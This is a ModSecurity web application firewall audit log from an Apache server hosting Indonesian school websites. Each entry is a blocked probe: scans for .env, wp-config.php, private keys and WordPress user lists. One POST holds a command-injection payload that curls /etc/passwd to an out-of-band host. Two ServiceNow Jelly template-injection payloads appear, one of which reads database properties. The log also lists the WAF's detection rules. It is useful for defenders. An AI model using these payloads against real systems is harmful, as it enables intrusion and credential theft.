Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1f7d14e-Z-- --0d4c297d-A-- [06/Jun/2025:06:19:51 +0700] aEImF-JsrKcXA4Tjex0GqQAAAEk 103.236.140.4 48588 103.236.140.4 8181 --0d4c297d-B-- GET /.env_1 HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC) Accept-Charset: utf-8 --0d4c297d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d4c297d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749165591611095 854 (- - -) Stopwatch2: 1749165591611095 854; combined=371, p1=338, p2=0, p3=0, p4=0, p5=33, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d4c297d-Z-- --571b2e2d-A-- [06/Jun/2025:06:40:23 +0700] aEIq5-JsrKcXA4Tjex0GrwAAAFQ 103.236.140.4 48662 103.236.140.4 8181 --571b2e2d-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 192 User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:135.0) Gecko/20100101 Firefox/135.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 172956281 --571b2e2d-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1&region=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0us2vpgpeonc6qdbef0m5w67p5bw1wcj.oast.me) --571b2e2d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --571b2e2d-E-- --571b2e2d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749166823415070 2554 (- - -) Stopwatch2: 1749166823415070 2554; combined=647, p1=424, p2=198, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --571b2e2d-Z-- --17ee3c42-A-- [06/Jun/2025:06:40:24 +0700] aEIq6OJsrKcXA4Tjex0GsgAAAFg 103.236.140.4 48682 103.236.140.4 8181 --17ee3c42-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 172707634 --17ee3c42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --17ee3c42-E-- --17ee3c42-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749166824070080 2221 (- - -) Stopwatch2: 1749166824070080 2221; combined=910, p1=349, p2=532, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17ee3c42-Z-- --0923dc11-A-- [06/Jun/2025:07:13:58 +0700] aEIyxtKrQJH3faNNWWAXSgAAAMw 103.236.140.4 48788 103.236.140.4 8181 --0923dc11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.102.236.19 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.102.236.19 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --0923dc11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0923dc11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749168838336462 3208 (- - -) Stopwatch2: 1749168838336462 3208; combined=1380, p1=463, p2=885, p3=0, p4=0, p5=32, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0923dc11-Z-- --a45b5068-A-- [06/Jun/2025:07:53:32 +0700] aEI8DNKrQJH3faNNWWAXrAAAAMg 103.236.140.4 49716 103.236.140.4 8181 --a45b5068-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 143.137.64.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.137.64.127 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a45b5068-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a45b5068-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749171212762657 3462 (- - -) Stopwatch2: 1749171212762657 3462; combined=1463, p1=486, p2=946, p3=0, p4=0, p5=31, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a45b5068-Z-- --5347b67e-A-- [06/Jun/2025:07:57:31 +0700] aEI8-_HwHPygw9BuFzQ2JAAAAJY 103.236.140.4 49972 103.236.140.4 8181 --5347b67e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.39.241.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.39.241.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5347b67e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5347b67e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749171451634538 3236 (- - -) Stopwatch2: 1749171451634538 3236; combined=1329, p1=470, p2=830, p3=0, p4=0, p5=29, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5347b67e-Z-- --2bfbff5d-A-- [06/Jun/2025:08:18:07 +0700] aEJBz_HwHPygw9BuFzQ2MAAAAJE 103.236.140.4 50122 103.236.140.4 8181 --2bfbff5d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.204.160.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.204.160.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --2bfbff5d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2bfbff5d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749172687750796 3132 (- - -) Stopwatch2: 1749172687750796 3132; combined=1311, p1=454, p2=828, p3=0, p4=0, p5=29, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bfbff5d-Z-- --a9d3da51-A-- [06/Jun/2025:08:45:25 +0700] aEJINWaFzeU7VUj_TDF04gAAABA 103.236.140.4 50422 103.236.140.4 8181 --a9d3da51-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 173732132 --a9d3da51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a9d3da51-E-- --a9d3da51-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. 
[file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174325224568 2561 (- - -) Stopwatch2: 1749174325224568 2561; combined=1340, p1=357, p2=947, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9d3da51-Z-- --507b1d3e-A-- [06/Jun/2025:08:48:04 +0700] aEJI1NKrQJH3faNNWWAYTgAAAMU 103.236.140.4 50530 103.236.140.4 8181 --507b1d3e-B-- GET /api/.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 172707658 --507b1d3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --507b1d3e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174484825333 718 (- - -) Stopwatch2: 1749174484825333 718; combined=256, p1=227, p2=0, p3=0, p4=0, p5=28, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --507b1d3e-Z-- --b872b251-A-- [06/Jun/2025:08:48:04 +0700] aEJI1NKrQJH3faNNWWAYTwAAANM 103.236.140.4 50534 103.236.140.4 8181 --b872b251-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173920999 --b872b251-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b872b251-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174484826950 665 (- - -) Stopwatch2: 1749174484826950 665; combined=257, p1=223, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b872b251-Z-- --215ebe1c-A-- [06/Jun/2025:08:48:04 +0700] aEJI1OJsrKcXA4Tjex0HQQAAAEg 103.236.140.4 50514 103.236.140.4 8181 --215ebe1c-B-- GET /etc/ssl/private/server.key HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173976139 --215ebe1c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --215ebe1c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174484860481 1856 (- - -) Stopwatch2: 1749174484860481 1856; combined=693, p1=348, p2=318, p3=0, p4=0, p5=26, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --215ebe1c-Z-- --26c60075-A-- [06/Jun/2025:08:48:04 +0700] aEJI1OJsrKcXA4Tjex0HQwAAAEo 103.236.140.4 50514 103.236.140.4 8181 --26c60075-B-- GET /.env.production HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173863884 --26c60075-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --26c60075-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174484862796 546 (- - -) Stopwatch2: 1749174484862796 546; combined=249, p1=222, p2=0, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26c60075-Z-- --13c80c05-A-- [06/Jun/2025:08:48:05 +0700] aEJI1YpHVOr-3zoVB37DuAAAAQ8 103.236.140.4 50538 103.236.140.4 8181 --13c80c05-B-- GET /_vti_pvt/service.pwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173534777 --13c80c05-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --13c80c05-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".pwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174485040559 2024 (- - -) Stopwatch2: 1749174485040559 2024; combined=727, p1=357, p2=306, p3=0, p4=0, p5=64, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13c80c05-Z-- --26317d09-A-- [06/Jun/2025:08:48:05 +0700] aEJI1dKrQJH3faNNWWAYUwAAAMw 103.236.140.4 50568 103.236.140.4 8181 --26317d09-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173863887 --26317d09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --26317d09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174485043547 677 (- - -) Stopwatch2: 1749174485043547 677; combined=291, p1=261, p2=0, p3=0, p4=0, p5=29, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26317d09-Z-- --75afd45f-A-- [06/Jun/2025:08:48:05 +0700] aEJI1WaFzeU7VUj_TDF08AAAABU 103.236.140.4 50580 103.236.140.4 8181 --75afd45f-B-- GET /web.config HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173534780 --75afd45f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --75afd45f-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/Web.config" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749174485043546 816 (- - -) Stopwatch2: 1749174485043546 816; combined=293, p1=260, p2=0, p3=0, p4=0, p5=32, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75afd45f-Z-- --eae4a109-A-- [06/Jun/2025:08:48:05 +0700] aEJI1YpHVOr-3zoVB37DugAAARE 103.236.140.4 50538 103.236.140.4 8181 --eae4a109-B-- GET /server.key HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 213.232.87.234 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Go-http-client/1.1 Cookie: X-Forwarded-For: 213.232.87.234 Accept-Encoding: gzip X-Varnish: 173921011 --eae4a109-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --eae4a109-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".key"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749174485043026 2023 (- - -) Stopwatch2: 1749174485043026 2023; combined=716, p1=410, p2=280, p3=0, p4=0, p5=26, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eae4a109-Z-- --27376535-A-- [06/Jun/2025:08:52:41 +0700] aEJJ6eJsrKcXA4Tjex0HRQAAAE8 103.236.140.4 50620 103.236.140.4 8181 --27376535-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.212.148.6 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.212.148.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --27376535-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --27376535-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
